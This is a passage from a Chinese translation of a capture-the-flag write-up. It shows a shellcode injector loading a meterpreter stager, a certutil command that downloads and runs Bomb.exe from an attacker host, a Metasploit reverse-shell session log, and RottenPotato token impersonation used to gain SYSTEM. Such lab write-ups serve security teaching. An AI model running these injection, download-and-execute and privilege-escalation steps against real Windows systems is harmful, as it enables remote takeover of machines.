0xf9,0x46,0x7d,0xaf,0x16,0x26,0x7f,0xaf,0xe6,0x6f,0x09,0x4a,0xaf,0xd3,0x0b,
0x95,0x31,0x90,0x06,0x9e,0x3d,0xfc,0x57,0xf4,0x74,0x89,0xbc,0xb8,0x0f,0x78,
0x7d,0xfb,0x5c,0x0d,0x58,0xfc,0xa3,0x24,0xe8,0x8b,0xb6,0xae,0xf0,0x8a,0x46,
0x2e,0xaa,0xcd,0xfc,0x07,0xcc,0xa5,0x00,0xa8,0x19,0x53,0x0b,0x17,0xfc,0xf4,
0x5b,0xda,0x31,0x3c,0x16,0xd5,0xf1,0xf6,0x56,0xd5,0xba,0x8f,0x6b,0x9d,0xc5,
0x50,0x23,0x94,0xfb,0x10,0x0e,0x4c,0xf4,0x4d,0x8e,0x6f,0xde,0x3a,0xc6,0x48,
0x8b,0xaa,0x99,0x0e,0x00,0x42,0xfb,0xe6,0x11,0xad,0xbd,0x4c,0xb8,0xeb,0x4a,
0xd1,0x44,0x26,0x37,0xd1,0xcf,0xc5,0x71,0x2e,0xe1,0xa3,0x64,0xb8,0x0e,0xfe,
0xc5,0x6e,0x10,0xd4,0x42,0x0d,0x02,0xc7,0x1a,0x98,0x39,0xa5,0xab,0x53,0xd7,
0x32,0x8d,0x3b,0x60,0xb2,0xf4,0xfa,0xca,0xc6,0xdf,0x34,0x75,0x38,0x0a,0x8c,
0x09,0x02,0x95,0x52,0x87,0x7d,0xbc,0x2a,0xd6,0xd8,0x29,0xaa,0xc8,0xda,0xa9,
0xeb,0xb0,0x92,0x20,0x19,0x08,0x12,0xfa,0x9c,0x33,0x0c,0x58,0x4d,0xa1,0x52,
0x75,0x39,0xa0,0x6e,0x3f,0x30,0x75,0x3d,0xf1,0x8b,0x33,0x37,0x01,0x43,0x4d,
0x9d,0xaa,0xda,0xb4,0x63,0x91,0xde,0x9f,0xac,0xba,0x21,0xca,0x65,0x44,0x1e,
0xbd,0x5c,0x80,0xe8,0xbb,0x69,0x79,0x09,0x82,0x6a,0x65 };
DWORD pid;
pid = CreateDecoyProcess();
if (!pid) return 1;
InjectShellcode(shellcode, szShellcode, pid);
    return 0;
}

这会将meterpreter stager注入远程进程并执行shellcode,之后我们就获得了一个meterpreter会话。

PS C:\windows\system32\inetsrv> cd \windows\temp
PS C:\windows\temp> cmd.exe /c certutil.exe -urlcache -split -f http://10.11.12.26:80/Bomb.exe c:\windows\temp\bomb1.exe
****  Online  ****
  000000  ...
  020c00
CertUtil: -URLCache command completed successfully.
PS C:\windows\temp> cmd.exe /c c:\windows\temp\bomb1.exe

然后我们可以通过metasploit处理程序获得我们的meterpreter会话。

msf > handler -p windows/x64/meterpreter/reverse_tcp -H tun0 -P 443
[*] Payload handler running as background job 0.
[*] [2018.09.16-15:13:49] Started reverse TCP handler on 10.11.12.26:443 
msf exploit(multi/handler) > 
[*] [2018.09.16-15:14:07] Encoded stage with x64/xor
[*] [2018.09.16-15:14:07] Sending encoded stage (206447 bytes) to 192.168.56.100
[*] Meterpreter session 1 opened (10.11.12.26:443 -> 192.168.56.100:49187) at 2018-09-16 15:14:08 -0700
[*] AutoAddRoute: Routing new subnet 10.11.12.0/255.255.255.0 through session 1
[*] AutoAddRoute: Routing new subnet 192.168.56.0/255.255.255.0 through session 1
[-] The 'stdapi' extension has already been loaded.
meterpreter >

现在只需要将RottenPotato.exe上传到C:\windows\temp目录,然后执行RottenPotato.exe并模拟令牌权限就可获得SYSTEM权限。

meterpreter > cd \\windows\\temp
meterpreter > upload /mnt/hgfs/andre/ownCloud/auto/pentest/windows/exploits/RottenPotato .
[*] uploading  : /mnt/hgfs/andre/ownCloud/auto/pentest/windows/exploits/RottenPotato/README.md -> .\README.md
[*] uploaded   : /mnt/hgfs/andre/ownCloud/auto/pentest/windows/exploits/RottenPotato/README.md -> .\README.md
[*] uploading  : /mnt/hgfs/andre/ownCloud/auto/pentest/windows/exploits/RottenPotato/rottenpotato.exe -> .\rottenpotato.exe
[*] uploaded   : /mnt/hgfs/andre/ownCloud/auto/pentest/windows/exploits/RottenPotato/rottenpotato.exe -> .\rottenpotato.exe
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================
IIS APPPOOL\DefaultAppPool
Impersonation Tokens Available
========================================
NT AUTHORITY\IUSR
meterpreter > execute -f rottenpotato.exe 
Process 1896 created.
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

从上面的输出你可以看到,我们通过meterpreter拿到了SYTEM权限,所以,我们现在完成了挑战。

本文翻译自:https://0x00-0x00.github.io/news/2018/09/16/kraken-writeup.html如若转载,请注明原文地址: http://www.4hou.com/web/14505.html
点赞 0
  • 分享至
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

发表评论